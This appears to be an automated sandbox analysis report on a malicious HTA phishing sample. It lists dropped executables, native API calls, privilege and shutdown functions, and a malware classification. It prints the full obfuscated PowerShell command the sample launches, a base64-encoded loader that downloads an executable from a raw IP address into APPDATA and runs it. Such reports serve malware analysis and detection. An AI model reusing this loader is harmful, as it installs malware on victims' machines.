Source: win[1].exe.3.dr String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_aac87086-2
Source: winnit.exe.3.dr String found in binary or memory: This is a third-party compiled AutoIt script. memstr_55dd69ee-c
Source: winnit.exe.3.dr String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_d2ce6728-d
Powershell drops PE file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\win[1].exe Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\winnit.exe Jump to dropped file
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0042CD33 NtClose, 7_2_0042CD33
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B735C0 NtCreateMutant,LdrInitializeThunk, 7_2_03B735C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72B60 NtClose,LdrInitializeThunk, 7_2_03B72B60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72DF0 NtQuerySystemInformation,LdrInitializeThunk, 7_2_03B72DF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B74340 NtSetContextThread, 7_2_03B74340
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B73090 NtSetValueKey, 7_2_03B73090
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B73010 NtOpenDirectoryObject, 7_2_03B73010
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B74650 NtSuspendThread, 7_2_03B74650
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72BA0 NtEnumerateValueKey, 7_2_03B72BA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72B80 NtQueryInformationFile, 7_2_03B72B80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72BF0 NtAllocateVirtualMemory, 7_2_03B72BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72BE0 NtQueryValueKey, 7_2_03B72BE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72AB0 NtWaitForSingleObject, 7_2_03B72AB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72AF0 NtWriteFile, 7_2_03B72AF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72AD0 NtReadFile, 7_2_03B72AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B739B0 NtGetContextThread, 7_2_03B739B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72FB0 NtResumeThread, 7_2_03B72FB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72FA0 NtQuerySection, 7_2_03B72FA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72F90 NtProtectVirtualMemory, 7_2_03B72F90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72FE0 NtCreateFile, 7_2_03B72FE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72F30 NtCreateSection, 7_2_03B72F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72F60 NtCreateProcessEx, 7_2_03B72F60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72EA0 NtAdjustPrivilegesToken, 7_2_03B72EA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72E80 NtReadVirtualMemory, 7_2_03B72E80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72EE0 NtQueueApcThread, 7_2_03B72EE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72E30 NtWriteVirtualMemory, 7_2_03B72E30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72DB0 NtEnumerateKey, 7_2_03B72DB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72DD0 NtDelayExecution, 7_2_03B72DD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72D30 NtUnmapViewOfSection, 7_2_03B72D30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72D10 NtMapViewOfSection, 7_2_03B72D10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B73D10 NtOpenProcessToken, 7_2_03B73D10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72D00 NtSetInformationFile, 7_2_03B72D00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B73D70 NtOpenThread, 7_2_03B73D70
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72CA0 NtQueryInformationToken, 7_2_03B72CA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72CF0 NtOpenProcess, 7_2_03B72CF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72CC0 NtQueryVirtualMemory, 7_2_03B72CC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72C00 NtQueryInformationProcess, 7_2_03B72C00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72C70 NtFreeVirtualMemory, 7_2_03B72C70
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72C60 NtCreateKey, 7_2_03B72C60
Contains functionality to communicate with device drivers
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00B1A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle, 6_2_00B1A1EF
Contains functionality to launch a process as a different user
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00B08310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 6_2_00B08310
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00B151BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 6_2_00B151BD
Detected potential crypto function
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00ADD975 6_2_00ADD975
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00AD21C5 6_2_00AD21C5
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00AE62D2 6_2_00AE62D2
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00B303DA 6_2_00B303DA
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00AE242E 6_2_00AE242E
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00AD25FA 6_2_00AD25FA
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00ABE6A0 6_2_00ABE6A0
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00AC66E1 6_2_00AC66E1
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00B0E616 6_2_00B0E616
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00AE878F 6_2_00AE878F
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00B18889 6_2_00B18889
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00AC8808 6_2_00AC8808
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00B30857 6_2_00B30857
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00AE6844 6_2_00AE6844
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00ADCB21 6_2_00ADCB21
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00AE6DB6 6_2_00AE6DB6
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00AC6F9E 6_2_00AC6F9E
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00AC3030 6_2_00AC3030
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00AD3187 6_2_00AD3187
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00ADF1D9 6_2_00ADF1D9
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00AB1287 6_2_00AB1287
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00AD1484 6_2_00AD1484
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00AC5520 6_2_00AC5520
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00AD7696 6_2_00AD7696
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00AC5760 6_2_00AC5760
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00AD1978 6_2_00AD1978
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00AE9AB5 6_2_00AE9AB5
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00ABFCE0 6_2_00ABFCE0
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00ADBDA6 6_2_00ADBDA6
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00AD1D90 6_2_00AD1D90
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00B37DDB 6_2_00B37DDB
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00AC3FE0 6_2_00AC3FE0
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00ABDF00 6_2_00ABDF00
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00F72F38 6_2_00F72F38
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00401995 7_2_00401995
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0040E849 7_2_0040E849
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00410823 7_2_00410823
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0040E8A3 7_2_0040E8A3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_004010AB 7_2_004010AB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_004010B0 7_2_004010B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0040E9E9 7_2_0040E9E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00401210 7_2_00401210
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00401A2C 7_2_00401A2C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00403230 7_2_00403230
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00401A87 7_2_00401A87
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0042F333 7_2_0042F333
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00401C6D 7_2_00401C6D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00401C70 7_2_00401C70
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00401DF0 7_2_00401DF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_004105FA 7_2_004105FA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00402659 7_2_00402659
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00402660 7_2_00402660
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00410603 7_2_00410603
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00416F0E 7_2_00416F0E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00416F13 7_2_00416F13
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B8739A 7_2_03B8739A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C003E6 7_2_03C003E6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B4E3F0 7_2_03B4E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF132D 7_2_03BF132D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BFA352 7_2_03BFA352
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2D34C 7_2_03B2D34C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B452A0 7_2_03B452A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BE12ED 7_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B5B2C0 7_2_03B5B2C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BE0274 7_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B4B1B0 7_2_03B4B1B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C001AA 7_2_03C001AA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF81CC 7_2_03BF81CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BDA118 7_2_03BDA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C0B16B 7_2_03C0B16B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B30100 7_2_03B30100
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F172 7_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B7516C 7_2_03B7516C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BC8158 7_2_03BC8158
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF70E9 7_2_03BF70E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BFF0E0 7_2_03BFF0E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BEF0CC 7_2_03BEF0CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B470C0 7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BFF7B0 7_2_03BFF7B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B3C7C0 7_2_03B3C7C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B40770 7_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B64750 7_2_03B64750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B5C6E0 7_2_03B5C6E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF16CC 7_2_03BF16CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BDD5B0 7_2_03BDD5B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C00591 7_2_03C00591
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B40535 7_2_03B40535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF7571 7_2_03BF7571
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BEE4F6 7_2_03BEE4F6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BFF43F 7_2_03BFF43F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B31460 7_2_03B31460
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF2446 7_2_03BF2446
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B5FB80 7_2_03B5FB80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB5BF0 7_2_03BB5BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B7DBF9 7_2_03B7DBF9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF6BD7 7_2_03BF6BD7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BFFB76 7_2_03BFFB76
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BFAB40 7_2_03BFAB40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BDDAAC 7_2_03BDDAAC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B85AA0 7_2_03B85AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B3EA80 7_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BEDAC6 7_2_03BEDAC6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB3A6C 7_2_03BB3A6C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BFFA49 7_2_03BFFA49
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF7A46 7_2_03BF7A46
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B429A0 7_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C0A9A6 7_2_03C0A9A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B56962 7_2_03B56962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B49950 7_2_03B49950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B5B950 7_2_03B5B950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B268B8 7_2_03B268B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B6E8F0 7_2_03B6E8F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B438E0 7_2_03B438E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BAD800 7_2_03BAD800
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B42840 7_2_03B42840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B4A840 7_2_03B4A840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BFFFB1 7_2_03BFFFB1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B41F92 7_2_03B41F92
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B4CFE0 7_2_03B4CFE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B32FC8 7_2_03B32FC8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B60F30 7_2_03B60F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B82F28 7_2_03B82F28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BFFF09 7_2_03BFFF09
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB4F40 7_2_03BB4F40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B49EB0 7_2_03B49EB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B52E90 7_2_03B52E90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BFCE93 7_2_03BFCE93
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BFEEDB 7_2_03BFEEDB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BFEE26 7_2_03BFEE26
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B40E59 7_2_03B40E59
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B58DBF 7_2_03B58DBF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B3ADE0 7_2_03B3ADE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B5FDC0 7_2_03B5FDC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B4AD00 7_2_03B4AD00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF7D73 7_2_03BF7D73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF1D5A 7_2_03BF1D5A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B43D40 7_2_03B43D40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BE0CB5 7_2_03BE0CB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B30CF2 7_2_03B30CF2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BFFCF2 7_2_03BFFCF2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB9C32 7_2_03BB9C32
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B40C00 7_2_03B40C00
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03B75130 appears 36 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03BBF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03BAEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03B2B970 appears 268 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03B87E54 appears 91 times
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: String function: 00AD0AE3 appears 70 times
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: String function: 00AD8900 appears 42 times
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: String function: 00AB7DE1 appears 36 times
Searches for the Microsoft Outlook file path
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Source: classification engine Classification label: mal100.phis.troj.expl.evad.winHTA@14/15@0/1
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00B1A06A GetLastError,FormatMessageW, 6_2_00B1A06A
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00B081CB AdjustTokenPrivileges,CloseHandle, 6_2_00B081CB
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00B087E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 6_2_00B087E1
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00B1B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 6_2_00B1B3FB
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00B2EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 6_2_00B2EE0D
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00B283BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear, 6_2_00B283BB
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00AB4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 6_2_00AB4E89
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\win[1].exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4180:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gjwt3tzc.v2e.ps1 Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: seemejkiss.hta ReversingLabs: Detection: 15%
Source: unknown Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\seemejkiss.hta"
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C pOWErshEll -EX BYpasS -nOP -W 1 -c dEviCeCredENTIaLDeplOYmEnT ; iNvOke-ExPrEssioN($(inVOkE-EXPrESsiON('[SysTEm.tEXt.EncodinG]'+[CHAr]58+[ChAR]58+'UTf8.gEtSTRing([sYStEM.CoNVeRt]'+[CHAR]58+[Char]0x3a+'FRoMbasE64stRinG('+[chAr]0x22+'JG9ZdHRwUm5vICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFZmluSXRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NjYk9WYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZ2QktSVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBiTUNmTnR4cCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcVBpZ1RIQkosSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCdFJmbmN1KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkhmVUhiZkVLRUIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRXNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3c0FNS05icCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG9ZdHRwUm5vOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMTk2LzQwMC93aW4uZXhlIiwiJGVudjpBUFBEQVRBXHdpbm5pdC5leGUiLDAsMCk7U3RBcnQtc0xlRVAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2lubml0LmV4ZSI='+[Char]0X22+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOWErshEll -EX BYpasS -nOP -W 1 -c dEviCeCredENTIaLDeplOYmEnT ; iNvOke-ExPrEssioN($(inVOkE-EXPrESsiON('[SysTEm.tEXt.EncodinG]'+[CHAr]58+[ChAR]58+'UTf8.gEtSTRing([sYStEM.CoNVeRt]'+[CHAR]58+[Char]0x3a+'FRoMbasE64stRinG('+[chAr]0x22+'JG9ZdHRwUm5vICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFZmluSXRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NjYk9WYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZ2QktSVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBiTUNmTnR4cCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcVBpZ1RIQkosSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCdFJmbmN1KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkhmVUhiZkVLRUIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRXNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3c0FNS05icCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG9ZdHRwUm5v